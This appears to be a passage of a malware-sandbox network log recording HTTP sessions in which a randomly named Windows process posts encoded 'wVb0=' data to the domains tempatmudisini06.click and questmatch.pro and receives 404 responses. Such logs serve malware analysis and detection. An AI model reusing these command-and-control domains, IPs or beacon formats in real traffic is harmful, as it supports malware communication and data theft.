                                                            Dec 5, 2024 19:41:31.426230907 CET1033INHTTP/1.1 404 Not Found
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 796
                                                            date: Thu, 05 Dec 2024 18:41:31 GMT
                                                            server: LiteSpeed
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.749989103.21.221.4806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:41:32.545327902 CET864OUTPOST /0kli/ HTTP/1.1
                                                            Host: www.tempatmudisini06.click
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 237
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.tempatmudisini06.click
                                                            Referer: http://www.tempatmudisini06.click/0kli/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 49 63 49 4d 73 54 61 7a 59 43 4a 65 4a 73 31 41 36 42 39 4a 71 55 69 43 63 47 73 65 54 35 4f 70 6e 37 6a 57 54 6a 50 76 43 6d 4f 61 4f 34 4b 54 59 67 38 6a 32 4e 6d 50 44 55 51 4d 72 4e 79 53 2f 67 55 48 49 58 52 33 66 6f 79 58 44 63 70 43 4f 71 65 73 66 39 74 48 66 65 37 55 34 30 6d 72 33 41 4e 4a 61 2f 68 4a 39 6c 75 32 53 63 30 71 57 46 4f 35 38 49 4b 55 72 70 46 7a 4a 4b 30 56 71 51 57 52 57 76 49 35 4c 54 6b 67 55 39 59 47 53 77 6e 35 4c 2f 44 74 62 44 42 34 69 39 67 72 61 7a 2b 58 33 49 33 72 70 79 55 65 61 4d 57 7a 61 72 69 2b 45 50 77 30 64 45 58 72 33 53 73 59 74 36 46 75 31 34 48 53 33 30 49 78 38 4e 58 49 6d 70 51 55 38 63 6f 64 52 62 2b 42 32 66 39 4a 2f 50 56 41 4b 69 59 3d
                                                            Data Ascii: wVb0=IcIMsTazYCJeJs1A6B9JqUiCcGseT5Opn7jWTjPvCmOaO4KTYg8j2NmPDUQMrNyS/gUHIXR3foyXDcpCOqesf9tHfe7U40mr3ANJa/hJ9lu2Sc0qWFO58IKUrpFzJK0VqQWRWvI5LTkgU9YGSwn5L/DtbDB4i9graz+X3I3rpyUeaMWzari+EPw0dEXr3SsYt6Fu14HS30Ix8NXImpQU8codRb+B2f9J/PVAKiY=
                                                            Dec 5, 2024 19:41:34.089931965 CET1033INHTTP/1.1 404 Not Found
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 796
                                                            date: Thu, 05 Dec 2024 18:41:33 GMT
                                                            server: LiteSpeed
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.749990103.21.221.4806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:41:35.215956926 CET1877OUTPOST /0kli/ HTTP/1.1
                                                            Host: www.tempatmudisini06.click
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 1249
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.tempatmudisini06.click
                                                            Referer: http://www.tempatmudisini06.click/0kli/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 49 63 49 4d 73 54 61 7a 59 43 4a 65 4a 73 31 41 36 42 39 4a 71 55 69 43 63 47 73 65 54 35 4f 70 6e 37 6a 57 54 6a 50 76 43 6e 32 61 4a 4c 53 54 59 42 38 6a 33 4e 6d 50 4b 30 51 4e 72 4e 79 66 2f 68 39 4d 49 58 63 4d 66 72 61 58 4d 66 52 43 48 37 65 73 57 39 74 48 44 75 37 56 6c 6b 6d 45 33 45 70 46 61 2f 78 4a 39 6c 75 32 53 65 63 71 51 58 32 35 36 49 4b 56 38 5a 46 33 59 61 30 78 71 55 36 76 57 76 4d 48 4c 69 45 67 55 64 6f 47 43 53 50 35 54 76 44 76 57 6a 42 57 69 39 39 7a 61 79 54 35 33 4a 43 77 70 31 67 65 5a 4b 33 34 50 6f 58 6a 57 75 42 76 62 43 7a 70 39 7a 63 38 72 62 35 69 71 49 2f 53 36 45 77 62 6b 64 6a 57 75 38 6f 56 72 4b 4e 73 52 59 4f 6b 6e 5a 59 59 72 76 56 32 51 33 53 39 6d 79 42 48 78 66 43 6b 42 78 5a 71 6d 35 31 6a 39 32 65 4e 72 39 79 6e 39 44 42 62 44 6a 6c 74 43 35 79 58 52 61 41 49 59 70 65 66 71 35 55 63 77 67 70 41 4c 54 71 73 6b 50 33 4c 65 57 35 4a 72 4f 45 41 30 6c 46 51 6b 70 64 39 35 6b 44 74 62 34 68 59 76 75 31 4d 52 67 61 76 52 2f 6f 78 34 47 50 41 31 [TRUNCATED]
                                                            Data Ascii: wVb0=IcIMsTazYCJeJs1A6B9JqUiCcGseT5Opn7jWTjPvCn2aJLSTYB8j3NmPK0QNrNyf/h9MIXcMfraXMfRCH7esW9tHDu7VlkmE3EpFa/xJ9lu2SecqQX256IKV8ZF3Ya0xqU6vWvMHLiEgUdoGCSP5TvDvWjBWi99zayT53JCwp1geZK34PoXjWuBvbCzp9zc8rb5iqI/S6EwbkdjWu8oVrKNsRYOknZYYrvV2Q3S9myBHxfCkBxZqm51j92eNr9yn9DBbDjltC5yXRaAIYpefq5UcwgpALTqskP3LeW5JrOEA0lFQkpd95kDtb4hYvu1MRgavR/ox4GPA1JsCrXefUQ2QmLDSWKoDjNgglxdi/CPDexNeBd7yvmr+Kcn0JR2Y2TLNoZyznvze2Z3Q5IfxnL7qbymKr2nDk5yT+TXyajFzoCLfp1dIW2EH0BRh5PkGqfx0qx0zkNRmgMq18L7JL1pAd+TA0tD4NH1widPWYHdsjVs4qJJjosQpNjhEGDVwH6H0jv7rX5BuZuQ8X2v8eOIuNjsYCMkX453b/cqixCwT0hLSRLTMhTVKSZ95AdIWkUqP0vkAZo2adY9YNz0tBqagDxt5CRWnvYqejO0YS3HIjvQnaklFhoeKe65tZaGV4Jo4D5SRw83YDhMXpHDJKaYkxAcw97TGazFX9L/j09Y7u1GJC5vp9+l5pgkWd3rZ0CtspU/N/H2xejKSDB7kFDQlPx+u2ph1/BwEPGjlqfqCyuY7PT6hcZOi5cIXXHbOGzoeHwbIkyr2en4ek7R8gPJxMnfweGyuKNO6txYiUgidIqzRSzF9nJYu7Nmx0CgTQYNaWIXoebJikbDIFdUR7UXDt1ow+M+htUomsQqqq0bItCkYkEv0piWX6iBoHdJngs0k8m2xNgTx83xAnAjf3VxngC4Z7kcdcvfIAhByhkwpW5B0v3HnZVrG1OylDPBEZZA46jWS5jvbntwOXzZJoqcn81P3djw3QZtzZfJ+BzFabVj [TRUNCATED]
                                                            Dec 5, 2024 19:41:36.764065981 CET1033INHTTP/1.1 404 Not Found
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 796
                                                            date: Thu, 05 Dec 2024 18:41:36 GMT
                                                            server: LiteSpeed
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.749991103.21.221.4806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:41:37.865684032 CET559OUTGET /0kli/?wVb0=Fegsvl+OGDJHKeUkviVqrWXmfitRVJjJzbj1DgnmRmeFZ5KITSJ35O+CNkAnveOy+X8wGwFlf4nSYcZPMr6/ALB9HdTqqkiH2QBnBPtm52OUHeYVRkXu0orA8o5vf7k6+C2EbfsSUCNF&0r=XzjtrBPP HTTP/1.1
                                                            Host: www.tempatmudisini06.click
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Dec 5, 2024 19:41:39.431226969 CET1033INHTTP/1.1 404 Not Found
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 796
                                                            date: Thu, 05 Dec 2024 18:41:39 GMT
                                                            server: LiteSpeed
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.749992104.21.62.184806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:41:44.915376902 CET820OUTPOST /ipd6/ HTTP/1.1
                                                            Host: www.questmatch.pro
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 217
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.questmatch.pro
                                                            Referer: http://www.questmatch.pro/ipd6/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 42 43 33 57 72 31 7a 44 44 6d 75 5a 55 5a 64 59 66 43 41 54 57 63 68 7a 4a 58 71 4a 74 37 44 45 64 73 4b 4f 71 78 64 35 34 47 77 5a 55 73 65 56 34 72 42 71 41 52 55 77 62 62 39 33 66 45 6b 77 6e 44 55 59 31 31 31 32 71 58 32 57 42 72 41 57 67 4f 4b 38 6d 4d 39 53 6d 7a 6f 67 78 72 44 49 51 4c 4c 74 74 54 6c 4f 37 50 39 67 30 53 72 64 78 54 57 53 4c 49 31 66 58 54 34 6a 4c 37 59 72 6a 72 52 73 76 69 59 45 6a 55 39 6e 6f 57 75 64 79 64 42 65 42 63 58 65 6f 41 36 76 49 6e 74 75 72 4a 4d 4b 51 38 54 69 52 38 77 58 79 57 61 67 79 76 65 38 68 76 43 58 79 65 39 4c 6a 6e 59 67 48 76 4f 41 32 33 44 45 56 4d 75 42 76 76 63 41 6d 51 3d 3d
                                                            Data Ascii: wVb0=BC3Wr1zDDmuZUZdYfCATWchzJXqJt7DEdsKOqxd54GwZUseV4rBqARUwbb93fEkwnDUY1112qX2WBrAWgOK8mM9SmzogxrDIQLLttTlO7P9g0SrdxTWSLI1fXT4jL7YrjrRsviYEjU9noWudydBeBcXeoA6vInturJMKQ8TiR8wXyWagyve8hvCXye9LjnYgHvOA23DEVMuBvvcAmQ==
                                                            Dec 5, 2024 19:41:46.204044104 CET1236INHTTP/1.1 404
                                                            Date: Thu, 05 Dec 2024 18:41:46 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Origin
                                                            Vary: Access-Control-Request-Method
                                                            Vary: Access-Control-Request-Headers
                                                            X-Correlation-ID: d1bf3981-20e3-47b8-818d-c35a17b0269c
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: 0
                                                            CF-Connecting-IP: 8.46.123.228
                                                            CF-IPCountry: US
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q8zXxzXchGqnNW0wOPxZfLMoEaYWYIlQ9bKgh7d5d4iuNYHUf83MCRwV5LaTFyiAk46T6L%2FqupMMWJJmHWk2WJia5j4pvrq0ok9jkAagbSwxv6wCn%2Fb8P2Mclfn2tl5LPzSy96o%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ed62c157b9e8ca2-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2009&min_rtt=2009&rtt_var=1004&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=820&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e 4d 0a c2 30 14 06 af 12 be 75 82 fd b3 d6 1c 40 70 a3 82 ee c4 45 92 97 6a 31 e6 49 9a 2e 44 7a 77 91 ae 67 18 e6 0b cb f4 81 8e 53 08 12 3e 25 4e 23 f4 17 8e c9 43 37 45 23 11 cd cb 43 e3 c0 59 ec 78 8a 04 09 f2 d9 0c
                                                            Data Ascii: b5$M0u@pEj1I.DzwgS>%N#C7E#CYx
                                                            Dec 5, 2024 19:41:46.204348087 CET103INData Raw: 61 84 be e2 c0 e2 61 22 05 9f 44 ff a7 a2 e7 24 4e c7 f3 45 ac 86 37 b5 2b dc e6 bf 6f a7 fb 3e f6 bc a4 53 f2 c1 e4 81 e3 9e a0 41 a5 ed eb 6d 57 aa aa f0 b5 6a 36 b6 53 5d d9 91 72 f5 da 94 1b 5b 54 ed d6 41 62 cc c6 3d 2f c9 38 bf dc ce f3 0f
                                                            Data Ascii: aa"D$NE7+o>SAmWj6S]r[TAb=/8_<0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.749993104.21.62.184806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:41:47.574449062 CET840OUTPOST /ipd6/ HTTP/1.1
                                                            Host: www.questmatch.pro
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 237
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.questmatch.pro
                                                            Referer: http://www.questmatch.pro/ipd6/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 42 43 33 57 72 31 7a 44 44 6d 75 5a 56 35 4e 59 65 68 59 54 65 63 68 79 4b 58 71 4a 30 4c 44 41 64 74 32 4f 71 7a 78 70 34 79 63 5a 61 75 47 56 35 71 42 71 4d 78 55 77 56 37 39 76 43 55 6b 37 6e 45 63 71 31 31 4a 32 71 58 79 57 42 76 45 57 68 2f 4b 39 67 63 39 51 75 54 6f 69 73 37 44 49 51 4c 4c 74 74 54 78 6b 37 50 56 67 30 43 62 64 77 32 36 56 43 6f 31 59 51 54 34 6a 50 37 5a 69 6a 72 52 65 76 6a 46 70 6a 58 56 6e 6f 54 53 64 72 73 42 64 49 63 58 59 73 41 36 36 45 57 51 6e 70 72 45 46 4a 4e 66 57 54 38 73 57 33 67 62 43 6f 4e 53 51 2f 2b 36 73 32 63 5a 39 30 42 46 56 46 75 4b 59 37 56 33 6c 4b 37 4c 72 69 39 39 45 77 70 38 33 72 38 54 4f 72 32 45 4f 76 79 30 49 41 77 4d 55 70 43 77 3d
                                                            Data Ascii: wVb0=BC3Wr1zDDmuZV5NYehYTechyKXqJ0LDAdt2Oqzxp4ycZauGV5qBqMxUwV79vCUk7nEcq11J2qXyWBvEWh/K9gc9QuTois7DIQLLttTxk7PVg0Cbdw26VCo1YQT4jP7ZijrRevjFpjXVnoTSdrsBdIcXYsA66EWQnprEFJNfWT8sW3gbCoNSQ/+6s2cZ90BFVFuKY7V3lK7Lri99Ewp83r8TOr2EOvy0IAwMUpCw=
                                                            Dec 5, 2024 19:41:48.859019041 CET1236INHTTP/1.1 404
                                                            Date: Thu, 05 Dec 2024 18:41:48 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Origin
                                                            Vary: Access-Control-Request-Method
                                                            Vary: Access-Control-Request-Headers
                                                            X-Correlation-ID: 942ad7a6-277e-4b9d-9849-84d6715cdbc1
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: 0
                                                            CF-Connecting-IP: 8.46.123.228
                                                            CF-IPCountry: US
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ujobnjQSCeLgp30KCK9GJt%2F6uzemBLxgwPWkO6oT0Np7Hm0iT9tJ3P7bgFCmrPsPoa904zxqURthM%2FH%2B2A6wd13C7w1O7eLLqfP7Pk3xLaXRY%2B7R9CG%2FkpQB2fr7BRppOQjJR3w%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ed62c261ad27cf0-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1819&rtt_var=909&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=840&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e 4d 0e 82 30 14 06 af d2 7c 6b 1a 94 54 7e 7a 00 13 36 68 22 3b e3 a2 f4 15 25 d6 3e 53 60 61 08 77 37 84 f5 4c 26 b3 a0 63 fa 41 87 d9 fb 04 2e 46 8e 23 f4 02 cb e4 a0 d5 41 25 08 e6 e3 a0 d1 f0 24 ce 3c
                                                            Data Ascii: b5$M0|kT~z6h";%>S`aw7L&cA.F#A%$<
                                                            Dec 5, 2024 19:41:48.859036922 CET108INData Raw: 07 42 02 72 93 19 fc 08 7d 47 c3 e2 65 02 79 17 45 bf 51 d1 73 14 d7 cb ad 15 e9 f0 a5 3c c5 63 dd fc 6e 7e d6 a1 e7 3d 1d a3 f3 66 1a 38 d4 04 8d 4a 65 86 0a 93 cb ac 28 9c 54 5d 45 b2 2a 55 25 4b 45 79 71 3c 59 ea ec 11 09 c6 c9 d8 77 1b 8d 75
                                                            Data Ascii: Br}GeyEQs<cn~=f8Je(T]E*U%KEyq<Ywu0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.749994104.21.62.184806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
